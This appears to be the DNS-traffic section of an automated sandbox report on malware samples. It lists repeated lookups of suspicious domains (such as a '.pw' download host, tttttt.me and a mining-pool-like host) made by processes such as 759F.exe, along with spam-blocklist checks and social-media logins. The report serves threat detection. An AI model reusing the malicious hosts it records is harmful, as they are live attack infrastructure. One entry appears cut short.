                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          iceanedy.com
                                                                                          dns
                                                                                          58 B
                                                                                          90 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          iceanedy.com

                                                                                          DNS Response

                                                                                          172.67.214.126
                                                                                          104.21.86.39

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          kodim.rdtk.io
                                                                                          dns
                                                                                          59 B
                                                                                          89 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          kodim.rdtk.io

                                                                                          DNS Response

                                                                                          23.105.36.164

                                                                                        • 8.8.8.8:53
                                                                                          www.utopia-network.org
                                                                                          dns
                                                                                          68 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.utopia-network.org

                                                                                          DNS Response

                                                                                          162.0.209.78

                                                                                        • 8.8.8.8:53
                                                                                          kit.fontawesome.com
                                                                                          dns
                                                                                          65 B
                                                                                          149 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          kit.fontawesome.com

                                                                                          DNS Response

                                                                                          104.18.22.52
                                                                                          104.18.23.52

                                                                                        • 8.8.8.8:53
                                                                                          unpkg.com
                                                                                          dns
                                                                                          55 B
                                                                                          135 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          unpkg.com

                                                                                          DNS Response

                                                                                          104.16.126.175
                                                                                          104.16.125.175
                                                                                          104.16.122.175
                                                                                          104.16.124.175
                                                                                          104.16.123.175

                                                                                        • 8.8.8.8:53
                                                                                          htagzdownload.pw
                                                                                          dns
                                                                                          Dywolaboshe.exe
                                                                                          62 B
                                                                                          127 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          htagzdownload.pw

                                                                                        • 8.8.8.8:53
                                                                                          stats.g.doubleclick.net
                                                                                          dns
                                                                                          69 B
                                                                                          155 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          stats.g.doubleclick.net

                                                                                          DNS Response

                                                                                          142.250.102.156
                                                                                          142.250.102.157
                                                                                          142.250.102.155
                                                                                          142.250.102.154

                                                                                        • 8.8.8.8:53
                                                                                          www.google.nl
                                                                                          dns
                                                                                          59 B
                                                                                          75 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.google.nl

                                                                                          DNS Response

                                                                                          172.217.168.227

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          venetrigni.com
                                                                                          dns
                                                                                          60 B
                                                                                          92 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          venetrigni.com

                                                                                          DNS Response

                                                                                          54.227.178.166
                                                                                          52.20.18.214

                                                                                        • 8.8.8.8:53
                                                                                          typiccor.com
                                                                                          dns
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          typiccor.com

                                                                                          DNS Response

                                                                                          54.225.64.149

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.microsoft.com
                                                                                          dns
                                                                                          126 B
                                                                                          460 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          www.microsoft.com

                                                                                          DNS Request

                                                                                          www.microsoft.com

                                                                                          DNS Response

                                                                                          80.67.94.7

                                                                                          DNS Response

                                                                                          104.85.1.163

                                                                                        • 8.8.8.8:53
                                                                                          www.bing.com
                                                                                          dns
                                                                                          58 B
                                                                                          206 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.bing.com

                                                                                          DNS Response

                                                                                          204.79.197.200
                                                                                          13.107.21.200

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          dns
                                                                                          148 B
                                                                                          260 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          13.71.61.154.dnsbl.sorbs.net

                                                                                          DNS Request

                                                                                          13.71.61.154.dnsbl.sorbs.net

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          dns
                                                                                          73 B
                                                                                          126 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.bl.spamcop.net

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          dns
                                                                                          75 B
                                                                                          139 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.zen.spamhaus.org

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          dns
                                                                                          79 B
                                                                                          143 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          13.71.61.154.sbl-xbl.spamhaus.org

                                                                                        • 8.8.8.8:53
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          dns
                                                                                          148 B
                                                                                          294 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          13.71.61.154.cbl.abuseat.org

                                                                                          DNS Request

                                                                                          13.71.61.154.cbl.abuseat.org

                                                                                        • 8.8.8.8:53
                                                                                          fastpool.xyz
                                                                                          dns
                                                                                          -a
                                                                                          58 B
                                                                                          74 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          fastpool.xyz

                                                                                          DNS Response

                                                                                          213.91.128.133

                                                                                        • 8.8.8.8:53
                                                                                          i.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          61 B
                                                                                          115 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          i.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.52

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          dns
                                                                                          91 B
                                                                                          107 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          999080321newfolder1002-01462599908032135.site

                                                                                          DNS Response

                                                                                          82.118.23.111

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.71.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          microsoft-com.mail.protection.outlook.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          174 B
                                                                                          238 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Request

                                                                                          microsoft-com.mail.protection.outlook.com

                                                                                          DNS Response

                                                                                          40.93.212.0
                                                                                          104.47.53.36

                                                                                          DNS Response

                                                                                          104.47.53.36
                                                                                          40.93.212.0

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          accounts.snapchat.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          67 B
                                                                                          114 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          accounts.snapchat.com

                                                                                          DNS Response

                                                                                          172.217.17.51

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          110 B
                                                                                          342 B
                                                                                          2
                                                                                          2

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          www.directdexchange.com
                                                                                          dns
                                                                                          69 B
                                                                                          99 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.directdexchange.com

                                                                                          DNS Response

                                                                                          35.201.70.46

                                                                                        • 8.8.8.8:53
                                                                                          dist.acnav.online
                                                                                          dns
                                                                                          63 B
                                                                                          197 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          dist.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          www.acnav.online
                                                                                          dns
                                                                                          62 B
                                                                                          194 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          ajax.googleapis.com
                                                                                          dns
                                                                                          65 B
                                                                                          81 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          ajax.googleapis.com

                                                                                          DNS Response

                                                                                          142.250.179.202

                                                                                        • 8.8.8.8:53
                                                                                          www.acnav.online
                                                                                          dns
                                                                                          62 B
                                                                                          194 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.acnav.online

                                                                                          DNS Response

                                                                                          54.91.59.199
                                                                                          3.220.57.224
                                                                                          52.20.78.240
                                                                                          3.232.242.170

                                                                                        • 8.8.8.8:53
                                                                                          cdnjs.cloudflare.com
                                                                                          dns
                                                                                          66 B
                                                                                          98 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          cdnjs.cloudflare.com

                                                                                          DNS Response

                                                                                          104.16.18.94
                                                                                          104.16.19.94

                                                                                        • 8.8.8.8:53
                                                                                          www.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          63 B
                                                                                          123 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          www.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.174

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          tttttt.me
                                                                                          dns
                                                                                          759F.exe
                                                                                          55 B
                                                                                          171 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          tttttt.me

                                                                                          DNS Response

                                                                                          54.197.173.238

                                                                                        • 8.8.8.8:53
                                                                                          i.instagram.com
                                                                                          dns
                                                                                          svchost.exe
                                                                                          61 B
                                                                                          115 B
                                                                                          1
                                                                                          1

                                                                                          DNS Request

                                                                                          i.instagram.com

                                                                                          DNS Response

                                                                                          31.13.83.52

                                                                                        MITRE ATT&CK Enterprise v6

                                                                                        Downloads

